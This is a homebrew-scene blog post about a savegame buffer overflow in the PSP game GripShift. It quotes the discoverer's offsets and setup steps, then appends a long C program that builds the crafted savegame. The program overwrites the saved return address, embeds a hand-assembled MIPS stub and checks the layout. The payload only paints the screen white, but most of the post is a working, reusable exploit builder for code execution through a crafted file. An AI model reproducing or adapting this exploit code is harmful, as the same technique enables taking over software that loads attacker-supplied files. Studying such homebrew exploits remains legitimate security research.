Aah, yes, new exploit, old game. It's so cool to actually see this beauty working - and on a PSP-3000 no less! The PSP scene was buzzing the other day when MaTiAz found an exploit (read: buffer overflow!) in the three-year-old game GripShift.
MaTiAz says they've yet to find any further use for it, but it's still a new exploit. For now it's merely a proof of concept, though it could lead to further hacks. Be that as it may, this is a great start and a rather sweet find! Here's MaTiAz explaining the exploit:
GripShift has a buffer overflow vulnerability when loading savegames. The savegame contains the profile name, which can be easily used to overwrite $ra. The savegame file is pretty big (25kB), so you have lots of space to put your code there. I wrote a simple blob of code to paint the framebuffer completely white (to just indicate that arbitrary code is running). The return address is located at offset 0xA9 in the file. In this PoC it points to 0x08E4CD50 (which is only a few bytes after the return address), and the code starts at 0xCC in the file.
It was tested on 4.01M33-2 with the US version of GripShift (ULUS10040), and psplink.prx, usbhostfs.prx and deemerh.prx loaded (also without psplink and usbhostfs). The decrypted savegame (sorry, couldn't [be bothered to] get Shine's savegame tool working, so it's in plaintext form) is in the SDDATA.BIN form which Hellcat's Savegame-Deemer produces (thanks to him; if the program didn't exist I wouldn't have bothered with this). Just copy the ULUS10040SAVE00 directory to /PSP/SAVEPLAIN/ and run the game. EDIT: yeah, don't forget to have Savegame-Deemer working, duh.
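To make the layout MaTiAz describes concrete, here is an added example (not MaTiAz's PoC and not code from the page) that builds a plaintext SDDATA.BIN-style file with the saved $ra at file offset 0xA9 overwritten by 0x08E4CD50 and a code stub at file offset 0xCC, then re-reads the file to check the layout before it is copied to ULUS10040SAVE00/. The three numbers come from the write-up; everything else is assumed: the exact file size (25600 bytes, for "25kB"), the 'A' filler standing in for the profile name, and the MIPS stub, which is a hand-assembled stand-in for the "paint the framebuffer white" blob that assumes the PSP's uncached VRAM at 0x44000000 and a 512x272 framebuffer. The load address of the file in RAM (0x08E4CC84) is derived from the write-up, since the return address points at file offset 0xCC.

```c
/* Added example: builds a plaintext SDDATA.BIN-style GripShift savegame laid
 * out as the write-up describes. Offsets and the return address come from the
 * post; the file size, the filler bytes and the MIPS stub are assumptions. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define SAVE_SIZE   25600u                    /* post says "25kB"; exact size assumed */
#define RA_OFFSET   0xA9u                     /* file offset of the saved $ra (from the post) */
#define CODE_OFFSET 0xCCu                     /* file offset where the code starts (from the post) */
#define RA_TARGET   0x08E4CD50u               /* value written over $ra (from the post) */
#define LOAD_BASE   (RA_TARGET - CODE_OFFSET) /* implied: RAM address of file offset 0 */

/* Assumed stand-in for MaTiAz's "paint the framebuffer white" blob:
 * hand-assembled little-endian MIPS that stores 0xFFFFFFFF over 512*272
 * words starting at 0x44000000 (assumed uncached VRAM on the PSP), then spins. */
static const uint32_t paint_white[] = {
    0x3C084400, /* lui   $t0, 0x4400        ; $t0 = 0x44000000 */
    0x2409FFFF, /* addiu $t1, $zero, -1     ; $t1 = 0xFFFFFFFF (white pixels) */
    0x3C0A0002, /* lui   $t2, 0x0002 */
    0x354A2000, /* ori   $t2, $t2, 0x2000   ; $t2 = 0x22000 = 512*272 words */
    0xAD090000, /* loop: sw $t1, 0($t0) */
    0x25080004, /* addiu $t0, $t0, 4 */
    0x254AFFFF, /* addiu $t2, $t2, -1 */
    0x1540FFFC, /* bne   $t2, $zero, loop */
    0x00000000, /* nop                      ; branch delay slot */
    0x1000FFFF, /* hang: beq $zero, $zero, hang */
    0x00000000  /* nop */
};

static void put_le32(uint8_t *p, uint32_t v) {
    p[0] = v & 0xFF; p[1] = (v >> 8) & 0xFF; p[2] = (v >> 16) & 0xFF; p[3] = (v >> 24) & 0xFF;
}
static uint32_t get_le32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Lay the file out: name padding up to the $ra slot, the return address,
 * non-zero filler up to the code, then the stub. Returns bytes written, or 0. */
size_t build_savegame(uint8_t *buf, size_t len) {
    size_t i, code_len = sizeof paint_white;
    if (!buf || len < SAVE_SIZE || CODE_OFFSET + code_len > len) return 0;
    memset(buf, 0, len);
    memset(buf, 'A', RA_OFFSET);                       /* overflowing profile name (filler assumed) */
    put_le32(buf + RA_OFFSET, RA_TARGET);              /* overwrite the saved $ra */
    memset(buf + RA_OFFSET + 4, 'A', CODE_OFFSET - RA_OFFSET - 4); /* keep the name NUL-free */
    for (i = 0; i < code_len / 4; i++)
        put_le32(buf + CODE_OFFSET + 4 * i, paint_white[i]);
    return SAVE_SIZE;
}

uint32_t read_ra(const uint8_t *buf, size_t len) {
    return (buf && len >= RA_OFFSET + 4) ? get_le32(buf + RA_OFFSET) : 0;
}

/* Checks worth running before copying the file to the stick: $ra points into
 * the file exactly at the code, the target is 4-byte aligned (MIPS faults on a
 * misaligned PC), the name bytes up to and including the address contain no
 * NUL (matters if the game copies the name as a C string), and the stub is
 * really at CODE_OFFSET. Returns 1 if all hold. */
int check_layout(const uint8_t *buf, size_t len) {
    size_t i;
    uint32_t ra;
    if (!buf || len < CODE_OFFSET + sizeof paint_white) return 0;
    ra = get_le32(buf + RA_OFFSET);
    if (ra != LOAD_BASE + CODE_OFFSET || (ra & 3)) return 0;
    for (i = 0; i < RA_OFFSET + 4; i++)
        if (buf[i] == 0) return 0;
    for (i = 0; i < sizeof paint_white / 4; i++)
        if (get_le32(buf + CODE_OFFSET + 4 * i) != paint_white[i]) return 0;
    return 1;
}

static uint8_t g_save[SAVE_SIZE];

int selftest(void) {
    return build_savegame(g_save, sizeof g_save) == SAVE_SIZE
        && read_ra(g_save, sizeof g_save) == RA_TARGET
        && check_layout(g_save, sizeof g_save);
}

int main(int argc, char **argv) {
    const char *path = argc > 1 ? argv[1] : "SDDATA.BIN";  /* drop into ULUS10040SAVE00/ */
    FILE *f;
    if (!selftest()) { fputs("layout check failed\n", stderr); return 1; }
    f = fopen(path, "wb");
    if (!f || fwrite(g_save, 1, sizeof g_save, f) != sizeof g_save) { perror(path); return 1; }
    fclose(f);
    printf("wrote %s: $ra@0x%X = 0x%08X, code@0x%X, file loads at 0x%08X\n",
           path, RA_OFFSET, RA_TARGET, CODE_OFFSET, LOAD_BASE);
    return 0;
}
```

Two details the check function encodes are worth noting. The write-up's address 0x08E4CD50 has no zero byte in little-endian form (50 CD E4 08), so it survives even if the game copies the profile name as a C string; and because the return address points into the savegame buffer itself, the code at 0xCC is just file bytes in memory and is free to contain zero words such as the nop in the delay slot.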